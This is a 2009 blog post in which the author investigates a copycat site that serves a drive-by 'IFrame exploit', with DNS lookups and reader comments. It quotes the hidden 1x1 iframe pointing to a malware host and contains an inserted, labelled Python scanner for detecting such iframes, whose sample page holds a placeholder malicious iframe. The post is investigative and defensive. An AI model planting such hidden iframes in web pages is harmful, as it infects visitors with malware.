! WARNING ! – DO NOT VISIT THE SITES BELOW – ! WARNING !
I noticed some Pakistan site had pingbacks for some articles we wrote, but no comments from the person that copy and pasted them (verbatim) on their site.
Well, being the person that I am, I fired up “Wireshark” on my Linux box (of course) to investigate their site further.
I noticed they had various other sites tied to the same domain, so I visited another one (other than the blog) and, lo and behold, something was a little fishy.
Their “photo” site tried to launch a little gift for me... an “IFrame exploit”, and if you’re running Windows you get a special prize for the visit... a worm. ;0)
While watching Wireshark, I noticed the iframe fire off to get our little prize, then a DNS request to reach out and grab it, etc.
SharkIT! ————————-
Example: ( I removed the numbers…but don’t mess around!)
<iframe src="http://asfirey.net/?click=xxxxxxx" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
————————————–
Now I’m not saying this is some evil plan from these guys, as this very same issue has been hitting thousands of legitimate sites, with attackers attempting (often successfully) to insert
the very same type of “IFrame Exploits” via SQL injection and XSS.
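The injected tag above has the three tell-tale properties of a drive-by iframe: a 1x1 size, a style that hides it, and a src pointing off-site. The following is an added example (not code from the original post) that scans HTML for exactly those properties, so a site owner can check their own pages for this kind of injection. The sample page is constructed, and the hostnames in it (evil.example, photos.example.com) are placeholders.

```python
"""Flag hidden or near-invisible <iframe> tags in HTML.

Added example, not from the original post. The SAMPLE page below is
constructed for demonstration; 'evil.example' is a placeholder host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles commonly used to keep an injected iframe out of sight.
SUSPICIOUS_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


def _dim(value):
    """Parse a width/height attribute such as '1', '1px' or '1%' to an int."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class IframeFinder(HTMLParser):
    """Collect iframes that look injected: tiny, hidden, or pointing off-site."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []

        # 1x1 (or 0x0) frames serve no purpose except to load something unseen.
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("tiny (%dx%d)" % (w, h))

        # Explicitly hidden via inline style.
        if SUSPICIOUS_STYLE.search(a.get("style", "")):
            reasons.append("hidden by style")

        # src host is neither the site nor one of its subdomains.
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site src %s" % host)

        if reasons:
            self.findings.append({
                "line": self.getpos()[0],   # line in the HTML where the tag starts
                "src": a.get("src", ""),
                "reasons": reasons,
            })


def find_hidden_iframes(html, site_host):
    """Return a list of suspicious iframe findings for the given page."""
    parser = IframeFinder(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate embedded viewer, one injected hidden frame.
SAMPLE = """<html><body>
<h1>Photo gallery</h1>
<iframe src="https://photos.example.com/viewer" width="600" height="400"></iframe>
<iframe src="http://evil.example/?click=PLACEHOLDER" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<p>end of page</p>
</body></html>"""


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE, "example.com"):
        print("line %d: %s  [%s]" % (f["line"], f["src"], "; ".join(f["reasons"])))
```

Run it against a saved copy of a page (open the file and pass its contents plus your own domain to find_hidden_iframes) rather than fetching live from a site you suspect; the legitimate 600x400 viewer on the same domain is not reported, while the 1x1 hidden off-site frame is flagged on all three counts.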
DIG’m Up! ———————————-
; <<>> DiG 9.6.1-P1-RedHat-9.6.1-4.P1.fc11 <<>> @ns1.hostmonster.com photo.csatpk.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28277
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;photo.csatpk.com. IN A
;; ANSWER SECTION:
photo.csatpk.com. 14400 IN A 74.220.207.85
;; AUTHORITY SECTION:
csatpk.com. 86400 IN NS ns1.hostmonster.com.
csatpk.com. 86400 IN NS ns2.hostmonster.com.
;; ADDITIONAL SECTION:
ns1.hostmonster.com. 14400 IN A 74.220.195.131
ns2.hostmonster.com. 14400 IN A 69.89.16.8
;; Query time: 234 msec
;; SERVER: 74.220.195.131#53(74.220.195.131)
;; WHEN: Thu Aug 27 20:54:24 2009
;; MSG SIZE rcvd: 130
dig @ns1.hostmonster.com blog.csatpk.com
; <<>> DiG 9.6.1-P1-RedHat-9.6.1-4.P1.fc11 <<>> @ns1.hostmonster.com blog.csatpk.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55817
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;blog.csatpk.com. IN A
;; ANSWER SECTION:
blog.csatpk.com. 14400 IN A 74.220.207.85
;; AUTHORITY SECTION:
csatpk.com. 86400 IN NS ns1.hostmonster.com.
csatpk.com. 86400 IN NS ns2.hostmonster.com.
;; ADDITIONAL SECTION:
ns1.hostmonster.com. 14400 IN A 74.220.195.131
ns2.hostmonster.com. 14400 IN A 69.89.16.8
;; Query time: 250 msec
;; SERVER: 74.220.195.131#53(74.220.195.131)
;; WHEN: Thu Aug 27 20:54:31 2009
;; MSG SIZE rcvd: 129
—————————————–
It seems that very same IP hosts almost 1400 other domains; a lot of them are crazy hostnames like the ones you might see with botnets, etc.
Hmmmmm... kinda weird for all those to be out in “Utah”. Yeah, I know anyone can host anywhere and hostmonster is big, but it’s still odd.
I’ll probably write both the domain admin and hostmonster tomorrow, in case they are just another victim of a drive-by injection, but I’m tired. ;0)
NOTE: Unrelated to this instance, but always keep in mind, even if you update your OS, Antivirus, Anti-Malware, Acrobat, Quicktime, Flash, and all other software on a regular basis,
it’s always possible to get hit by something fresh off the minds of the bad guys.
Once again... install Linux, FreeBSD, or even OS X and go ride your bike.
HTH
Brother, we were hit by the iframe virus, and on our blog we have posted a perfect method for removing this exploit. We have written a script for it; here is the link:
http://blog.csatpk.com/2010/02/htmliframe-inf-removal-instruction/
And remember, we are FreeBSD/Linux users, no compromise on security.
We believe in community!
Thanks for posting that link!